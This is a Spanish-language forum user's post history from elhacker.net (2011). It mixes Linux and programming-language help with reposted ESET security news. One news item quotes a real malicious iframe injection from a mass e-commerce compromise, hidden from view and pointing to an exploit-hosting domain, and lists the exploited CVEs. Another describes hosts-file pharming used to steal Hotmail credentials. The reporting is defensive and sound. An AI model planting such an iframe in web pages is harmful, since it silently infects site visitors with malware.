elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11
1  Sistemas Operativos / GNU/Linux / Re: Sin sonido en ubuntu como root pero si como root en: 30 Julio 2011, 22:47
Yo tampoco puedo entrar a la configuración de sonido, y eso al parecer se debe porque desinstalé pulseaudio e instale alsa.

Quizás esto te sirva:
http://www.ubuntu-es.org/node/138671

Y sino:
Ver resultados en google
2  Foros Generales / Noticias / Inyección masiva de iframes a sitios de e-commerce en: 30 Julio 2011, 03:39
Un grupo de investigadores publicó en su blog, una nueva alerta de un ataque masivo a páginas con inyección de iframe activo, que estuvo particularmente focalizado en sitios de e-commerce. El ataque fue reportado con más de 90 mil páginas afectadas. El iframe permite la ejecución de contenido externo en la página que se está visitando. De esta forma, los visitantes de todos los sitios afectados podían infectarse con malware por el solo hecho de visitar un sitio web de confianza.

A través de diversas vulnerabilidades, todas las páginas afectadas se encuentran con la siguiente inyección de iframe:


Código
  1. <title>Wholesaler<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe></title>

Una vez que el usuario visita alguna de las web infectadas, se ejecuta en la maquina del usuario, a través de un ataque multi-stage, código javascript que explota las siguientes vulnerabilidades que afectan al explorador web:

  • CVE-2010-0840 – Java Trust
  • CVE-2010-0188 – PDF LibTiff
  • CVE-2010-0886 – Java SMB
  • CVE-2006-0003 – IE MDAC
  • CVE-2010-1885 – HCP

Los dominios donde se alojan los exploit se encuentran en Rusia y son bloqueadas por nuestro software de seguridad. Analizando los sitios donde se encontraba presente este iframe, pudimos encontrar que estos son sensibles a inyecciones de SQL.

Es por eso que ante estos casos, si un desarrollador se encuentra ante este problema, debería revisar el código fuente de todas las páginas del sitio, para buscar este tipo de contenido no legítimo y verificar si el sitio web está infectado. Así también es importante tener en cuenta los siguientes consejos:

  • Que todas las contraseñas del FTP sean rotadas y se utilicen contraseñas fuertes para todos los usuarios. También se recomienda borrar usuarios que no estén en uso.
  • Que el sistema operativo no tenga vulnerabilidades, es decir que que todas las actualizaciones de software estén instaladas.
  • Que las aplicaciones (especialmente la aplicación web o el gestor de contenidos) también tengan todos los parches de seguridad instalados.

Vale destacar que, a este momento, se encuentran en el mismo enlace del buscador provisto por los investigadores, muchos más sitios web infectados por el mismo incidente:


El código malicioso que se descarga en el último paso del ataque, es un troyano.

Fuente: http://blog.armorize.com/
Adaptación: Laboratorios ESET
3  Foros Generales / Dudas Generales / Re: Segun Tu!!! en: 29 Julio 2011, 01:27
Excelente entonce:

C/C++.
Java.
Python.

Aunque no tengo idea del porque mencionan a google ? Si se que google esta echo en esto 3 lenguaje y unos cuantos mas.

Los principales lenguajes de Google son esos. Que edad tienes? Te empeze hablando de que, ademas de ser excelentes lenguajes, C++ y Java son los que llegan el "negocio" hoy en dia. Que incluso Google los usa, y sus proyectos estaban basados en esos tres lenguajes, aunque tambien hay otros sobre Perl, Ruby y algunos más.

Saludos!
4  Foros Generales / Dudas Generales / Re: Segun Tu!!! en: 28 Julio 2011, 22:11
Justamente hoy he estado en una escuela de informatica mirando certificaciónes y he preguntado por programación en C, me han dicho que solo daban la de C++ y que havia poquísima demanda de esta.

Me han recomendado Java y es que solo entrar en paginas de trabajo lo que mas piden es este. LAa certificación me han dicho que me costaria alrededor de unos 1800€. junto exámenes.

C++ y Java son los lenguajes que llevan la movida hoy en día. De paso aprende Python y terminas ganando miles en Google ::)

PD: Cpp + Python + Java = Google
PD2: No está de más decir que deberás estudiar la POO (Programación Orientada a Objetos)
5  Foros Generales / Dudas Generales / Re: Segun Tu!!! en: 28 Julio 2011, 20:00
Para con eso aquí no hay ningún mal lenguaje esto depende de que tanto tiempo le dediques

Algunos dicen que el tema de los lenguajes es algo personal. Por otra parte, no te recomendaría VB.NET ya que te limita al Framework, y VB6 a Windows. Te recomiendo:

1. ASM
2. C/C++
3. Python/Perl


Luego, tambien debes tener conocimientos web. Aunquesea lo basico.

1. HTML
2. PHP


Saludos!
6  Foros Generales / Noticias / Robo masivo de cuentas Hotmail en Brazil en: 28 Julio 2011, 19:44
Para lograr este objetivo, los atacantes realizan lo que se conoce como un ataque de pharming local, en donde a través de la modificación del archivo hosts se redirecciona al usuario a una página falsa, para robar sus claves de acceso. El ataque es simple, la posible víctima ingresa al sitio, cree que está accediendo a su correo electrónico, e intenta iniciar sesión. Sin embargo, al utilizar sus datos para inicio de sesión, recibe un mensaje de error.

Lo que realmente ocurre es que ha caído víctima de este ataque, y ahora sus credenciales se encuentran en manos de los atacantes, quienes podrán utilizarlas para continuar propagando esta amenaza a todos sus contactos. A continuación se puede observar qué es lo que realmente se almacena en este servidor:


En la imagen anterior, se puede observar parte de los archivos de texto en donde se almacenan más de 27.000 credenciales de usuarios de Hotmail, en 13.406 archivos de texto, creados entre el 21 de julio a las 21:56 hasta el martes 26 a las 11:14. Actualmente el sitio se encuentra caído.

Durante un total de 6 días de actividad, los usuarios cuyos equipos se encuentran infectados con esta amenaza, generaron un total de 27.211  registros de correos y contraseñas.

Sobre el total de los datos robados, se encuentran 8.233 direcciones de correos únicas, lo que resulta en un promedio de 3 accesos por usuario, que no pudieron reconocer una página falsa, en un total de 6 días de actividad del sitio malicioso. En otras palabras, más de 8.200 personas son víctimas potenciales del robo de información e identidad por parte de los desarrolladores de este ataque.

Tomando las fechas de los datos registrados en el servidor de los atacantes, se puede concluir, que las víctimas del engaño, infectaron sus equipos a través de los correos falsos que decían contener un video de la presidenta de Brasil, Dilma Rousseff, y las fotos del fallecimiento de Amy Winehouse.

En conclusión, los atacantes, hacen uso de la Ingeniería Social, con el objetivo de atraer la atención de los usuarios y así robar su información.

Fuente: Laboratorios ESET
7  Seguridad Informática / Seguridad / Re: Que Me Recomiendan Para Proteger Bien Mi Pc? en: 28 Julio 2011, 06:54
Sobre antivirus el NOD32 siempre me fallo
yo te recomiendo el avast! xD

pero bueno voy a tu pregunta firewall
creo que el PC Tolls Firewall plus te va a andar bien es bastante estable y es bastante "amigable"

Avast! es terriblemente malo. Definitivamente ESET NOD32 Antivirus o Avira Premium. Por otro lado, si no tienes experiencia con esto de los firewalls, te recomiendo utilizar ZoneAlarm o Comodo Firewall.

De lo contrario, nuevamente el consejo de WHK.
8  Sistemas Operativos / GNU/Linux / Re: ayudenme tengo un serio problema con la CIA en: 28 Julio 2011, 06:43
Es tal exactamente como te lo dijo WHK, y como te lo he dicho anteriormente yo, con hacer un ping a la web sacas la IP y no por eso LA CIA te estará buscando.

Para que dejes de fanfarronear, al visitar un sitio web te estas conectando a él, lo único que haces es ver a donde te conectas.

Revisa el archivo HOST de Windows, quizás tambien encontremos algo ahí.

Código:
Windows/System32/Drivers/etc/host

Simplemente copias el contenido, y lo pegas aquí entre las etiquetas de [code]contenido aqui[/code]

Si luego de pasar los antivirus y de revisar el contenido de ese archivo los problemas siguen, te invito a que hagas un log de Hijackthis y lo peges exactamente como el contenido del archivo host.

http://www.trendmicro.com/ftp/products/hijackthis/HiJackThis.msi

Espero que sigas todo al paso de la letra como te lo han indicado. Y la proxima vez, investiga bien sobre el tema y utiliza fuentes fiables para descargar información.

Saludos!
9  Sistemas Operativos / GNU/Linux / Re: ayudenme tengo un serio problema con la CIA en: 28 Julio 2011, 06:22
A veces esos problemas pasan. Apaga el router y el modem, conecta directamente el modem a tu PC. Si internet funciona, ya puedes volver a la configuración del router.

Dudo mucho que la CIA te busque por hacerle un ping al sitio web, eso solo pasa en las peliculas.
10  Foros Generales / Foro Libre / Re: ¿Porque no inventan una especie de 'esqueleto' que proteja los autos/vehiculos? en: 27 Julio 2011, 20:16
Los autos  de carreras, como TC2000 tiene ese "esqueleto" del que hablas, pero solo protegen el interior del automovil, no lo que está afuera.

Saludos!
Páginas: [1] 2 3 4 5 6 7 8 9 10 11
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines